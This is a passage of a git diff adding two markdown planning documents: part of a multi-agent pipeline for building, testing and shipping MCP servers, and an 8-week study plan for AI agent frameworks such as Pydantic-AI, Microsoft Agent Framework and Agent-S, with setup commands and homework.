-f /tmp/test-{app}.png +``` + +#### Layer 3: Functional Testing +- **Tool invocation:** Send natural language messages, verify correct tool is triggered +- **Data flow:** Send a message → verify AI returns APP_DATA block → verify app receives data +- **Thread lifecycle:** Create thread → interact → close → delete → verify cleanup +- **Cross-channel:** Open app from one channel, switch channels, come back — does state persist? + +#### Layer 4: Live API Testing (when credentials available) +- Authenticate with real API credentials +- Call each tool with real parameters +- Verify response shapes match what apps expect +- Test error cases (invalid IDs, missing permissions, rate limits) + +#### Layer 5: Integration Testing +- Full flow: user sends message → AI responds → app renders → user interacts in thread +- Test with 2-3 realistic use cases per channel + +### Automated test script pattern: +```bash +#!/bin/bash +# MCP QA Test Runner +SERVICE="$1" +RESULTS="/tmp/mcp-qa-${SERVICE}.md" + +echo "# QA Report: ${SERVICE}" > "$RESULTS" +echo "Date: $(date)" >> "$RESULTS" + +# Static checks +echo "## Static Analysis" >> "$RESULTS" +cd "${SERVICE}-mcp" +npm run build 2>&1 | tail -5 >> "$RESULTS" + +# App file checks +echo "## App Files" >> "$RESULTS" +for f in app-ui/*.html ui/dist/*.html; do + [ -f "$f" ] && echo "✅ $f ($(wc -c < "$f") bytes)" >> "$RESULTS" +done + +# Route mapping check +echo "## Route Mapping" >> "$RESULTS" +# ... 
verify APP_NAME_MAP entries exist +``` + +### Quality Gate: +- [ ] All static analysis passes +- [ ] Every app renders visually (verified by screenshot) +- [ ] At least 3 NL messages trigger correct tools +- [ ] Thread create/interact/delete cycle works +- [ ] No console errors in browser dev tools + +### QA → Fix Feedback Loop + +QA findings don't just get logged — they route back to the responsible agent for fixes: + +| Finding Type | Routes To | Fix Cycle | +|-------------|-----------|-----------| +| Tool description misrouting | Agent 1 (Analyst) — update analysis doc, then Agent 2 rebuilds | Re-run QA Layer 3 after fix | +| Server crash / protocol error | Agent 2 (Builder) — fix server code | Re-run QA Layers 0-1 | +| App visual bug / accessibility | Agent 3 (Designer) — fix HTML app | Re-run QA Layers 2-2.5 | +| Integration wiring issue | Agent 4 (Integrator) — fix channel config | Re-run QA Layers 3, 5 | +| APP_DATA shape mismatch | Agent 3 + Agent 4 — align app expectations with system prompt | Re-run QA Layer 3 + 5 | + +**Rule:** No server ships with any P0 QA failures. P1 warnings are documented. The fix cycle repeats until QA passes. + +--- + +## Phase 6: Ship (Documentation & Deployment) + +**Skill:** Part of each phase (not separate) + +### Per-server README must include: +- What the service does +- Setup instructions (env vars, API key acquisition) +- Complete tool list with descriptions +- App gallery (screenshots or descriptions) +- Known limitations + +### Post-Ship: MCP Registry Registration + +Register shipped servers in the [MCP Registry](https://registry.modelcontextprotocol.io) for discoverability: +- Server metadata (name, description, icon, capabilities summary) +- Authentication requirements and setup instructions +- Tool catalog summary (names + descriptions) +- Link to README and setup guide + +The MCP Registry launched preview Sep 2025 and is heading to GA. Registration makes your servers discoverable by any MCP client. 
+ +--- + +## Post-Ship Lifecycle + +Shipping is not the end. APIs change, LLMs update, user patterns evolve. + +### Monitoring (continuous) +- **APP_DATA parse success rate** — target >98%, alert at <95% (see QA Tester Layer 6) +- **Tool correctness sampling** — 5% of interactions weekly, LLM-judged +- **User retry rate** — if >25%, system prompt needs tuning +- **Thread completion rate** — >80% target + +### API Change Detection (monthly) +- Check API changelogs for breaking changes, new endpoints, deprecated fields +- Re-run QA Layer 4 (live API testing) quarterly for active servers +- Update MSW mocks when API response shapes change + +### Re-QA Cadence +| Trigger | Scope | Frequency | +|---------|-------|-----------| +| API version bump | Full QA (all layers) | On detection | +| MCP SDK update | Layers 0-1 (protocol + static) | Monthly | +| System prompt change | Layers 3, 5 (functional + integration) | On change | +| App template update | Layers 2-2.5 (visual + accessibility) | On change | +| LLM model upgrade | DeepEval tool routing eval | On model change | +| Routine health check | Layer 4 (live API) + smoke test | Quarterly | + +--- + +## MCP Apps Protocol (Adopt Now) + +> The MCP Apps extension is **live** as of January 26, 2026. Supported by Claude, ChatGPT, VS Code, and Goose. + +Key features: +- **`_meta.ui.resourceUri`** on tools — tools declare which UI to render +- **`ui://` resource URIs** — server-side HTML/JS served as MCP resources +- **JSON-RPC over postMessage** — standardized bidirectional app↔host communication +- **`@modelcontextprotocol/ext-apps`** SDK — App class with `ontoolresult`, `callServerTool` + +**Implication for LocalBosses:** The custom hidden `APP_DATA` block pattern works but is LocalBosses-specific. MCP Apps is the official standard for delivering UI from tools. **New servers should adopt MCP Apps. Existing servers should add MCP Apps support alongside the current pattern for backward compatibility.** + +Migration path: +1. 
Add `_meta.ui.resourceUri` to tool definitions in the server builder +2. Register app HTML files as `ui://` resources in each server +3. Update app template to use `@modelcontextprotocol/ext-apps` App class +4. Maintain backward compat with postMessage/polling for LocalBosses during transition + +--- + +## Operational Notes + +### Version Control Strategy + +All pipeline artifacts should be tracked: + +``` +{service}-mcp/ +├── .git/ # Each server is its own repo (or monorepo) +├── src/ # Server source +├── app-ui/ # App HTML files +├── test-fixtures/ # Test data (committed) +├── test-baselines/ # Visual regression baselines (committed via LFS for images) +├── test-results/ # Test outputs (gitignored) +└── mcp-factory-reviews/ # QA reports (committed for trending) +``` + +- **Branching:** `main` is production. `dev` for active work. Feature branches for new tool groups. +- **Tagging:** Tag each shipped version: `v1.0.0-{service}`. Tag corresponds to the analysis doc version + build. +- **Monorepo option:** For 30+ servers, consider a Turborepo workspace with shared packages (logger, client base class, types). 
+ +### Capacity Planning (Mac Mini) + +Running 30+ MCP servers as stdio processes on a Mac Mini: + +| Config | Capacity | Notes | +|--------|----------|-------| +| Mac Mini M2 (8GB) | ~15 servers | Each Node.js process uses 50-80MB RSS at rest | +| Mac Mini M2 (16GB) | ~25 servers | Leave 4GB for OS + LocalBosses app | +| Mac Mini M2 Pro (32GB) | ~40 servers | Comfortable headroom | + +**Mitigations for constrained memory:** +- Lazy loading (already implemented) — tools only load when called +- On-demand startup — only start servers that have active channels +- HTTP transport with shared process — multiple "servers" behind one Node process +- Containerized with memory limits — `docker run --memory=100m` per server +- PM2 with max memory restart — `pm2 start index.js --max-memory-restart 150M` + +### Server Prioritization (30 Untested Servers) + +For the 30 built-but-untested servers, prioritize by: + +| Criteria | Weight | How to Assess | +|----------|--------|---------------| +| **Business value** | 40% | Which services do users ask about most? Check channel requests. | +| **Credential availability** | 30% | Can we get API keys/sandbox access today? No creds = can't do Layer 4. | +| **API stability** | 20% | Is the API mature (v2+) or beta? Stable APIs = fewer re-QA cycles. | +| **App complexity** | 10% | Simple CRUD (fast) vs complex workflows (slow). Start with simple. | + +**Recommended first batch (highest priority):** +Servers with sandbox APIs + high business value + simple CRUD patterns. Run them through the full pipeline first to validate the process, then tackle complex ones. 
+ +--- + +## Agent Roles + +For mass production, these phases map to specialized agents: + +### Agent 1: API Analyst (`mcp-analyst`) +- **Input:** "Here's the API docs for ServiceX" +- **Does:** Reads all docs, produces `{service}-api-analysis.md` +- **Model:** Opus (needs deep reading comprehension) +- **Skills:** `mcp-api-analyzer` + +### Agent 2: Server Builder (`mcp-builder`) +- **Input:** `{service}-api-analysis.md` +- **Does:** Generates full MCP server with all tools +- **Model:** Sonnet (code generation, well-defined patterns) +- **Skills:** `mcp-server-builder`, `mcp-server-development` + +### Agent 3: App Designer (`mcp-designer`) +- **Input:** `{service}-api-analysis.md` + built server +- **Does:** Creates all HTML apps +- **Model:** Sonnet (HTML/CSS generation) +- **Skills:** `mcp-app-designer`, `frontend-design` + +### Agent 4: Integrator (`mcp-integrator`) +- **Input:** Built server + apps +- **Does:** Wires into LocalBosses (channels, routing, intakes, system prompts) +- **Model:** Sonnet +- **Skills:** `mcp-localbosses-integrator` + +### Agent 5: QA Tester (`mcp-qa`) +- **Input:** Integrated LocalBosses channel +- **Does:** Visual + functional testing, produces test report +- **Model:** Opus (multimodal analysis, judgment calls) +- **Skills:** `mcp-qa-tester` +- **Tools:** Peekaboo, Gemini, browser screenshots + +### Orchestration (6 phases with feedback loop): +``` +[You provide API docs] + │ + ▼ + P1: Agent 1 — Analyst ──→ analysis.md + │ + ├──→ P2: Agent 2 — Builder ──→ MCP server ──┐ + │ │ (parallel) + └──→ P3: Agent 3 — Designer ──→ HTML apps ──┘ + │ + ▼ + P4: Agent 4 — Integrator ──→ LocalBosses wired up + │ + ▼ + P5: Agent 5 — QA Tester ──→ Test report + │ + ┌────────┴────────┐ + │ Findings? │ + │ P0 failures ──→ Route back to + │ Agent 2/3/4 for fix + │ All clear ──→ │ + └────────┬────────┘ + ▼ + P6: Ship + Registry Registration + Monitoring +``` + +Agents 2 and 3 run in parallel since apps only need the analysis doc + tool definitions. 
QA failures loop back to the responsible agent — no server ships with P0 issues. + +--- + +## Current Inventory (Feb 3, 2026) + +### Completed (in LocalBosses): +- n8n (automations channel) — 8 apps +- GHL CRM (crm channel) — 65 apps +- Reonomy (reonomy channel) — 3 apps +- CloseBot (closebot channel) — 6 apps +- Meta Ads (meta-ads channel) — 11 apps +- Google Console (google-console channel) — 5 apps +- Twilio (twilio channel) — 19 apps + +### Built but untested (30 servers): +Acuity Scheduling, BambooHR, Basecamp, BigCommerce, Brevo, Calendly, ClickUp, Close, Clover, Constant Contact, FieldEdge, FreshBooks, Freshdesk, Gusto, Help Scout, Housecall Pro, Jobber, Keap, Lightspeed, Mailchimp, Pipedrive, Rippling, ServiceTitan, Squarespace, Toast, TouchBistro, Trello, Wave, Wrike, Zendesk + +### Priority: Test the 30 built servers against live APIs and bring the best ones into LocalBosses. + +--- + +## File Locations + +| What | Where | +|------|-------| +| This document | `MCP-FACTORY.md` | +| Skills | `~/.clawdbot/workspace/skills/mcp-*/` | +| Built servers | `mcp-diagrams/mcp-servers/{service}/` or `{service}-mcp/` | +| LocalBosses app | `localbosses-app/` | +| GHL apps (65) | `mcp-diagrams/GoHighLevel-MCP/src/ui/react-app/src/apps/` | +| App routing | `localbosses-app/src/app/api/mcp-apps/route.ts` | +| Channel config | `localbosses-app/src/lib/channels.ts` | diff --git a/agent-repos-study-plan.md b/agent-repos-study-plan.md new file mode 100644 index 0000000..b1475c7 --- /dev/null +++ b/agent-repos-study-plan.md @@ -0,0 +1,1497 @@ +# 🧠 AI Agent Frameworks — 8-Week Deep Study Plan + +> **Goal:** Go from "I've heard of these" to "I could build & deploy production systems with these" in 8 weeks. 
+> **Time commitment:** ~1-2 hours/day, Mon-Fri +> **Based on:** [Trending Repos Deep Dive Analysis](./trending-repos-deep-dive.md) (Feb 2026) +> **Last updated:** February 4, 2026 + +--- + +## 📋 Table of Contents + +- [Week 0: Prep & Prerequisites](#week-0-prep--prerequisites) +- [Week 1: Pydantic-AI](#week-1-pydantic-ai) — The Production SDK ⭐⭐ +- [Week 2: Microsoft Agent Framework](#week-2-microsoft-agent-framework) — Enterprise Orchestration ⭐⭐⭐ +- [Week 3: Agent-S](#week-3-agent-s) — Computer Use Pioneer ⭐⭐⭐⭐ +- [Week 4: GPT Researcher](#week-4-gpt-researcher) — Deep Research Agent ⭐⭐ +- [Week 5: Yao](#week-5-yao) — Event-Driven Agents in Go ⭐⭐⭐⭐ +- [Week 6: MetaGPT](#week-6-metagpt) — Multi-Agent SOP Framework ⭐⭐⭐ +- [Week 7: ElizaOS](#week-7-elizaos) — Deployment & Multi-Platform Distribution ⭐⭐ +- [Week 8: Capstone Project](#week-8-capstone-project) +- [Appendix: Comparison Matrix Template](#appendix-comparison-matrix-template) + +> ⭐ = Difficulty Rating (1-5). More stars = harder week. + +--- + +## Week 0: Prep & Prerequisites + +> **Timeline:** The weekend before you start. ~3-4 hours total. 
+ +### Environment Setup + +- [ ] **Python 3.11+** installed (`python --version`) +- [ ] **Go 1.21+** installed for Week 5 (`go version`) +- [ ] **Node.js 18+** and `pnpm` installed (needed for MetaGPT and Yao) +- [ ] **Docker Desktop** installed and running +- [ ] **Git** configured with SSH keys for cloning repos +- [ ] **VS Code** (or your editor) with Python + Go extensions +- [ ] **A GPU or cloud GPU access** (optional, helps for Agent-S grounding model) + +### API Keys & Accounts + +- [ ] **OpenAI API key** — used by almost every framework +- [ ] **Anthropic API key** — primary for Pydantic-AI examples +- [ ] **Tavily API key** — required for GPT Researcher (free tier works: [app.tavily.com](https://app.tavily.com)) +- [ ] **Azure OpenAI access** — needed for Microsoft Agent Framework (free trial available) +- [ ] **Hugging Face account + token** — needed for Agent-S grounding model +- [ ] **Google API key** — optional, for Gemini-based features in GPT Researcher + +### Workspace Setup + +```bash +# Create a clean workspace for all 8 weeks (7 framework weeks + capstone) +mkdir -p ~/agent-study/{week1-pydantic-ai,week2-ms-agent,week3-agent-s,week4-gpt-researcher,week5-yao,week6-metagpt,week7-elizaos,capstone} +mkdir -p ~/agent-study/notes +mkdir -p ~/agent-study/comparison-matrix + +# Initialize a git repo for your study notes +cd ~/agent-study +git init +echo "# AI Agent Frameworks Study" > README.md +git add . && git commit -m "init study workspace" +``` + +### Background Reading (1-2 hours) + +Read these before Week 1. They're the conceptual foundation: + +- [ ] **[Plan-and-Solve Prompting](https://arxiv.org/abs/2305.04091)** — The paper behind GPT Researcher's architecture. Skim the abstract + Section 3. +- [ ] **[RAG paper](https://arxiv.org/abs/2005.11401)** — Core concept used by multiple frameworks. Read abstract + intro. +- [ ] **[Model Context Protocol (MCP) spec](https://modelcontextprotocol.io/)** — Anthropic's protocol for tool integration. Read the overview page. 
+- [ ] **[Agent2Agent (A2A) protocol](https://google.github.io/A2A/)** — Google's agent interop standard. Skim the spec overview. +- [ ] **[Pydantic docs (crash course)](https://docs.pydantic.dev/latest/concepts/models/)** — If you're rusty on Pydantic, spend 30 min here. It's the foundation of Week 1. + +### Mental Model to Build + +Every agent framework answers the same 5 questions differently: + +1. **How do you define an agent?** (class, function, config, DSL) +2. **How do agents use tools?** (function calling, MCP, code execution) +3. **How do multiple agents coordinate?** (graph, SOP, message passing, events) +4. **How do you handle errors & retries?** (automatic, manual, durable execution) +5. **How do you observe what happened?** (logging, tracing, replay) + +Keep these questions in mind every week. By the end of Week 7, you'll have 7 different answers for each. + +--- + +## Week 1: Pydantic-AI + +> **Difficulty:** ⭐⭐ (Approachable — excellent docs, familiar Python patterns) +> **Repo:** [github.com/pydantic/pydantic-ai](https://github.com/pydantic/pydantic-ai) +> **Stars:** 14.6k | **Language:** Python | **Version:** v1.52.0+ + +### Why This Is Week 1 + +Pydantic-AI is the most ergonomic agent framework and has the best docs. Starting here builds your mental model for how agent SDKs *should* feel. Everything after this week will be compared to Pydantic-AI's developer experience. It's the FastAPI of agents — you'll understand why once you use it. 
+ +### Resources + +| Resource | Link | +|----------|------| +| 📖 Documentation | [ai.pydantic.dev](https://ai.pydantic.dev/) | +| 💬 Community (Slack) | [Pydantic Slack](https://logfire.pydantic.dev/docs/join-slack/) | +| 📦 PyPI | [pydantic-ai](https://pypi.org/project/pydantic-ai/) | +| 🔭 Observability | [Pydantic Logfire](https://pydantic.dev/logfire) | +| 📝 Blog: How it was built | [Pydantic blog](https://pydantic.dev/articles) | +| 🎥 Intro video | Search "Pydantic AI tutorial 2025" on YouTube | + +### 🗂 Source Code Guide — "Read THESE Files" + +``` +pydantic_ai_slim/pydantic_ai/ +├── agent/ +│ └── __init__.py # ⭐ THE file. Agent class definition, run(), run_sync(), run_stream() +├── _agent_graph.py # ⭐ Internal agent execution graph — how runs actually execute +├── tools.py # ⭐ Tool decorator, RunContext, tool schema generation +├── result.py # ⭐ RunResult, StreamedRunResult — output handling +├── models/ +│ ├── __init__.py # Model ABC — how all model providers implement the same interface +│ ├── openai.py # OpenAI provider implementation +│ └── anthropic.py # Anthropic provider implementation +├── _a2a.py # Agent2Agent protocol integration +├── mcp.py # MCP client/server integration +└── _output.py # Output type handling, Pydantic validation on LLM outputs +``` + +> **💡 Tip:** Start with `agent/__init__.py`. It's beautifully documented with docstrings. Then read `tools.py` to understand how the `@agent.tool` decorator works. Finally, read `_agent_graph.py` to see how the runtime orchestrates tool calls. 
+ +--- + +### Day 1 (Monday): Architecture Deep Dive + +**Read:** +- [ ] The full [README](https://github.com/pydantic/pydantic-ai) +- [ ] Docs: [Introduction](https://ai.pydantic.dev/) +- [ ] Docs: [Agents](https://ai.pydantic.dev/agents) +- [ ] Docs: [Models Overview](https://ai.pydantic.dev/models/overview) +- [ ] Docs: [Tools](https://ai.pydantic.dev/tools) +- [ ] Docs: [Output / Structured Results](https://ai.pydantic.dev/output) +- [ ] Docs: [Dependency Injection](https://ai.pydantic.dev/dependencies) (if exists) or see DI pattern in the bank support example + +**Identify core abstractions:** +- `Agent` — the central class (generic over deps + output type) +- `RunContext` — carries dependencies into tool functions +- `Tool` — decorated functions the LLM can call +- `ModelSettings` — per-request model configuration +- `RunResult` / `StreamedRunResult` — typed output containers + +**Understand the execution flow:** +``` +User prompt → Agent.run() → Model call → [Tool call → Tool execution → Model call]* → Validated output +``` + +- [ ] **📝 Homework:** Write a 1-page architecture summary at `~/agent-study/notes/week1-architecture.md` + - Cover: Agent lifecycle, dependency injection pattern, how tools are registered and called, how output validation works + - Draw a simple diagram (ASCII or hand-drawn photo is fine) + +--- + +### Day 2 (Tuesday): Hello World + Core Concepts + +**Setup:** +```bash +cd ~/agent-study/week1-pydantic-ai +python -m venv .venv && source .venv/bin/activate +pip install pydantic-ai +``` + +**Run the quickstart:** +```python +from pydantic_ai import Agent + +agent = Agent( + 'anthropic:claude-sonnet-4-0', + instructions='Be concise, reply with one sentence.', +) + +result = agent.run_sync('Where does "hello world" come from?') +print(result.output) +``` + +**Understand the core API surface:** +- [ ] `agent.run()` vs `agent.run_sync()` vs `agent.run_stream()` +- [ ] How `instructions` work (static string vs dynamic function) +- [ ] How 
model selection works (string shorthand vs model objects) +- [ ] How `result.output` is typed + +- [ ] **📝 Homework:** Build the simplest agent from scratch — NO copy-paste + - Requirements: takes a topic, returns a structured output (use a Pydantic model as the output type) + - Must use at least one custom instruction + - Save at `~/agent-study/week1-pydantic-ai/hello_agent.py` + +--- + +### Day 3 (Wednesday): Intermediate Build — Structured Output + DI + +**Focus: Pydantic-AI's killer features — type-safe structured output and dependency injection** + +**Work through:** +- [ ] The [bank support agent example](https://ai.pydantic.dev/#tools-dependency-injection-example) from the docs +- [ ] Docs: [Structured Output / Streamed Results](https://ai.pydantic.dev/output#streamed-results) +- [ ] Docs: [Graph Support](https://ai.pydantic.dev/graph) + +**Key concepts to grok:** +- How `RunContext[DepsType]` carries typed dependencies +- How Pydantic models as output types create validated, structured responses +- How tool docstrings become the tool description sent to the LLM +- How streaming works with structured output (partial validation!) + +- [ ] **📝 Homework:** Build an agent that uses the framework's unique capabilities: + - **Must include:** Dependency injection with a real dependency (database mock, API client, etc.) + - **Must include:** Structured output via a Pydantic model (not just string output) + - **Must include:** At least 2 tools + - Example idea: A "recipe finder" agent with deps for a recipe database, tools for searching and filtering, output as a structured `Recipe` model + - Save at `~/agent-study/week1-pydantic-ai/structured_agent.py` + +--- + +### Day 4 (Thursday): Advanced Patterns + Source Code Reading + +**Read these source files (in order):** +1. `pydantic_ai_slim/pydantic_ai/agent/__init__.py` — How `Agent` class is defined, the generic type parameters +2. 
`pydantic_ai_slim/pydantic_ai/tools.py` — How `@tool` works, schema generation, `RunContext` +3. `pydantic_ai_slim/pydantic_ai/_agent_graph.py` — The internal execution engine +4. `pydantic_ai_slim/pydantic_ai/result.py` — How results are wrapped, streamed, validated +5. `pydantic_ai_slim/pydantic_ai/models/__init__.py` — The model provider ABC + +**Understand:** +- [ ] How errors from tool execution are passed back to the LLM for retry +- [ ] How streaming works internally (incremental Pydantic validation) +- [ ] How the `_agent_graph.py` orchestrates the conversation loop +- [ ] How durable execution checkpoints work + +**Explore advanced features:** +- [ ] Docs: [Durable Execution](https://ai.pydantic.dev/durable_execution/overview/) +- [ ] Docs: [MCP Integration](https://ai.pydantic.dev/mcp/overview) +- [ ] Docs: [Human-in-the-Loop](https://ai.pydantic.dev/deferred-tools) +- [ ] Docs: [Evals](https://ai.pydantic.dev/evals) + +- [ ] **📝 Homework:** Write "What I'd Steal from Pydantic-AI" at `~/agent-study/notes/week1-steal.md` + - Focus on: DI pattern, type-safe generics, streaming validation, tool retry pattern + - What design decisions are genius? What would you do differently? + +--- + +### Day 5 (Friday): Integration Project + Reflection + +- [ ] **Build a mini-project** that integrates with something real: + - **Suggested:** An agent that queries a real API (weather, GitHub, Hacker News), processes the data through tools, and returns a structured report as a Pydantic model + - **Bonus:** Add Logfire observability (it's free tier) and see the traces + - **Bonus:** Expose it as an MCP server + - Save at `~/agent-study/week1-pydantic-ai/integration_project/` + +- [ ] **Write retrospective** at `~/agent-study/notes/week1-retro.md`: + - Strengths of Pydantic-AI + - Weaknesses / gaps you noticed + - When would you reach for this vs building from scratch? + - What surprised you? 
+ +- [ ] **Start comparison matrix** at `~/agent-study/comparison-matrix/matrix.md` (see [template](#appendix-comparison-matrix-template)) + +### 🎯 Key Questions — You Should Be Able to Answer: + +1. What does the `Agent` class generic signature `Agent[DepsType, OutputType]` buy you? +2. How does dependency injection work in Pydantic-AI and why is it better than global state? +3. How does Pydantic-AI validate structured output from an LLM that returns free-form text? +4. What happens when a tool call fails? How does the retry loop work? +5. What's the difference between `run()`, `run_sync()`, and `run_stream()`? +6. How would you add a new model provider to Pydantic-AI? +7. What is durable execution and when would you use it? + +--- + +## Week 2: Microsoft Agent Framework + +> **Difficulty:** ⭐⭐⭐ (Larger surface area, graph concepts, mono-repo navigation) +> **Repo:** [github.com/microsoft/agent-framework](https://github.com/microsoft/agent-framework) +> **Stars:** 7k | **Languages:** Python + .NET | **Born from:** Semantic Kernel + AutoGen + +### Why This Is Week 2 + +If Pydantic-AI is the developer's choice, Microsoft Agent Framework is the enterprise's choice. It introduces graph-based workflows — a fundamentally different orchestration model from the simple agent loop you learned in Week 1. Understanding this framework means understanding where corporate AI agent development is heading. 
+ +### Resources + +| Resource | Link | +|----------|------| +| 📖 Documentation | [learn.microsoft.com/agent-framework](https://learn.microsoft.com/en-us/agent-framework/) | +| 🚀 Quick Start | [Quick Start Tutorial](https://learn.microsoft.com/agent-framework/tutorials/quick-start) | +| 💬 Discord | [Discord](https://discord.gg/b5zjErwbQM) | +| 🎥 Intro Video (30 min) | [YouTube](https://www.youtube.com/watch?v=AAgdMhftj8w) | +| 🎥 DevUI Demo (1 min) | [YouTube](https://www.youtube.com/watch?v=mOAaGY4WPvc) | +| 📦 PyPI | [agent-framework](https://pypi.org/project/agent-framework/) | +| 📝 Migration from SK | [Semantic Kernel Migration](https://learn.microsoft.com/en-us/agent-framework/migration-guide/from-semantic-kernel) | +| 📝 Migration from AutoGen | [AutoGen Migration](https://learn.microsoft.com/en-us/agent-framework/migration-guide/from-autogen) | + +### 🗂 Source Code Guide + +``` +python/packages/ +├── agent-framework/ # ⭐ Core package — agents, middleware, workflows +│ └── src/agent_framework/ +│ ├── agents/ # Agent base classes and implementations +│ ├── workflows/ # ⭐ Graph-based workflow engine +│ └── middleware/ # ⭐ Request/response middleware pipeline +├── azure-ai/ # Azure AI provider (Responses API) +├── openai/ # OpenAI provider +├── anthropic/ # Anthropic provider +├── devui/ # ⭐ Developer UI for debugging workflows +├── mcp/ # MCP integration +├── a2a/ # Agent2Agent protocol +└── lab/ # Experimental features (benchmarking, RL) + +python/samples/getting_started/ +├── agents/ # ⭐ Start here — basic agent examples +├── workflows/ # ⭐ Graph workflow examples (critical!) +├── middleware/ # Middleware examples +└── observability/ # OpenTelemetry integration +``` + +> **💡 Tip:** This is a mono-repo. Don't try to read everything. Focus on `python/packages/agent-framework/` for the core, and `python/samples/getting_started/workflows/` for the graph workflow examples. 
+ +--- + +### Day 1 (Monday): Architecture Deep Dive + +**Read:** +- [ ] [Overview](https://learn.microsoft.com/agent-framework/overview/agent-framework-overview) +- [ ] The full [README](https://github.com/microsoft/agent-framework) +- [ ] [User Guide Overview](https://learn.microsoft.com/en-us/agent-framework/user-guide/overview) +- [ ] Watch the [30-min intro video](https://www.youtube.com/watch?v=AAgdMhftj8w) (at 1.5x speed) +- [ ] Skim the [SK migration guide](https://learn.microsoft.com/en-us/agent-framework/migration-guide/from-semantic-kernel) to understand lineage + +**Identify core abstractions:** +- `Agent` — base agent interface +- `Workflow` / `Graph` — the graph-based orchestration system +- `Middleware` — request/response processing pipeline +- `AgentProvider` — LLM provider abstraction +- `DevUI` — visual debugging tool + +**Key architectural insight:** This framework uses a **data-flow graph** model where nodes are agents or functions, and edges carry data between them. This is fundamentally different from Pydantic-AI's linear agent loop. 
+ +- [ ] **📝 Homework:** Write a 1-page architecture summary at `~/agent-study/notes/week2-architecture.md` + - Compare the graph workflow model to Pydantic-AI's linear model + - Draw the graph workflow concept (nodes = agents/functions, edges = data flow) + +--- + +### Day 2 (Tuesday): Hello World + Core Concepts + +**Setup:** +```bash +cd ~/agent-study/week2-ms-agent +python -m venv .venv && source .venv/bin/activate +pip install agent-framework --pre +# You'll need Azure credentials or an OpenAI key +``` + +**Run the quickstart:** +```python +import asyncio +from agent_framework.openai import OpenAIChatClient + +async def main(): + agent = OpenAIChatClient( + api_key="your-key" + ).as_agent( + name="HaikuBot", + instructions="You are an upbeat assistant that writes beautifully.", + ) + print(await agent.run("Write a haiku about AI agents.")) + +asyncio.run(main()) +``` + +**Understand:** +- [ ] `as_agent()` pattern — how providers become agents +- [ ] The difference between Chat agents and Responses agents +- [ ] How the Python API differs from the .NET API (skim a .NET example) + +- [ ] **📝 Homework:** Build the simplest agent from scratch — NO copy-paste + - Save at `~/agent-study/week2-ms-agent/hello_agent.py` + +--- + +### Day 3 (Wednesday): Intermediate Build — Graph Workflows + +**This is the key differentiator. 
This is the day that matters.** + +**Work through:** +- [ ] `python/samples/getting_started/workflows/` — all examples +- [ ] Docs: Workflow/Graph tutorials on learn.microsoft.com +- [ ] Understand streaming, checkpointing, and time-travel in graphs + +**Key concepts:** +- How nodes in a graph can be agents OR deterministic functions +- How data flows between nodes via typed edges +- How checkpointing enables pause/resume of long-running workflows +- How human-in-the-loop fits into the graph model +- How time-travel lets you replay/debug workflows + +- [ ] **📝 Homework:** Build a graph workflow: + - **Must include:** At least 3 nodes (mix of agent nodes and function nodes) + - **Must include:** Branching logic (conditional edges) + - Example idea: A "content pipeline" — Node 1 (agent: research a topic) → Node 2 (function: format research) → Node 3 (agent: write blog post) with a branch for "needs more research" + - Save at `~/agent-study/week2-ms-agent/graph_workflow.py` + +--- + +### Day 4 (Thursday): Advanced Patterns + Source Code Reading + +**Read these source files:** +1. Core agent base classes in `python/packages/agent-framework/` +2. Workflow/graph engine implementation +3. Middleware pipeline implementation +4. DevUI package structure +5. At least one provider implementation (OpenAI or Azure) + +**Explore:** +- [ ] Set up and run the **DevUI** — visualize your graph workflow from Day 3 +- [ ] Look at the **OpenTelemetry integration** — `python/samples/getting_started/observability/` +- [ ] Read the **middleware examples** — understand the request/response pipeline +- [ ] Check out the **lab package** — what's experimental? + +- [ ] **📝 Homework:** Write "What I'd Steal from MS Agent Framework" at `~/agent-study/notes/week2-steal.md` + - Focus on: Graph workflow model, DevUI concept, middleware pipeline, multi-language support + - Compare to Pydantic-AI: when would you choose one over the other? 
+ +--- + +### Day 5 (Friday): Integration Project + Reflection + +- [ ] **Build a mini-project:** + - **Suggested:** A multi-step data processing pipeline using graph workflows + - Must have: at least one agent node calling an LLM, at least one pure function node, checkpointing enabled + - **Bonus:** Get the DevUI running and screenshot your workflow visualization + - Save at `~/agent-study/week2-ms-agent/integration_project/` + +- [ ] **Write retrospective** at `~/agent-study/notes/week2-retro.md` +- [ ] **Update comparison matrix** — add MS Agent Framework entry + +### 🎯 Key Questions: + +1. What's the difference between a linear agent loop and a graph-based workflow? +2. How does checkpointing work in MS Agent Framework workflows? +3. What does "time-travel" mean in the context of agent debugging? +4. How does the middleware pipeline work and when would you use it? +5. What's the DevUI and what can you debug with it that you can't with logs alone? +6. How does this framework's agent abstraction compare to Pydantic-AI's `Agent` class? +7. When would you choose MS Agent Framework over Pydantic-AI? (Think: team size, workflow complexity, language requirements) + +--- + +## Week 3: Agent-S + +> **Difficulty:** ⭐⭐⭐⭐ (Requires GPU for grounding model, novel paradigm, research-grade code) +> **Repo:** [github.com/simular-ai/Agent-S](https://github.com/simular-ai/Agent-S) +> **Stars:** 9.6k | **Language:** Python | **Papers:** ICLR 2025, COLM 2025 + +### Why This Is Week 3 + +This is a completely different paradigm. Weeks 1-2 were about agents that work with APIs and text. Agent-S works with **pixels and clicks** — it uses your computer like a human does. This is the frontier of agent development. Understanding Agent-S means understanding where computer-use agents are heading. 
+ +### Resources + +| Resource | Link | +|----------|------| +| 📖 Repo | [github.com/simular-ai/Agent-S](https://github.com/simular-ai/Agent-S) | +| 💬 Discord | [Discord](https://discord.gg/E2XfsK9fPV) | +| 📄 S1 Paper (ICLR 2025) | [arxiv.org/abs/2410.08164](https://arxiv.org/abs/2410.08164) | +| 📄 S2 Paper (COLM 2025) | [arxiv.org/abs/2504.00906](https://arxiv.org/abs/2504.00906) | +| 📄 S3 Paper | [arxiv.org/abs/2510.02250](https://arxiv.org/abs/2510.02250) | +| 🌐 S3 Blog | [simular.ai/articles/agent-s3](https://www.simular.ai/articles/agent-s3) | +| 🎥 S3 Video | [YouTube](https://www.youtube.com/watch?v=VHr0a3UBsh4) | +| 📦 PyPI | [gui-agents](https://pypi.org/project/gui-agents/) | +| 🤗 Grounding Model | [UI-TARS-1.5-7B](https://huggingface.co/ByteDance-Seed/UI-TARS-1.5-7B) | + +### 🗂 Source Code Guide + +``` +gui_agents/ +├── s3/ # ⭐ Latest version — start here +│ ├── cli_app.py # ⭐ Entry point — CLI application, main loop +│ ├── agents/ # ⭐ Agent implementations (planning, grounding, execution) +│ ├── core/ # ⭐ Core abstractions (screenshot, actions, state) +│ ├── bbon/ # Behavior Best-of-N — sampling strategy for better performance +│ └── prompts/ # System prompts for each agent role +├── s2/ # Previous version +├── 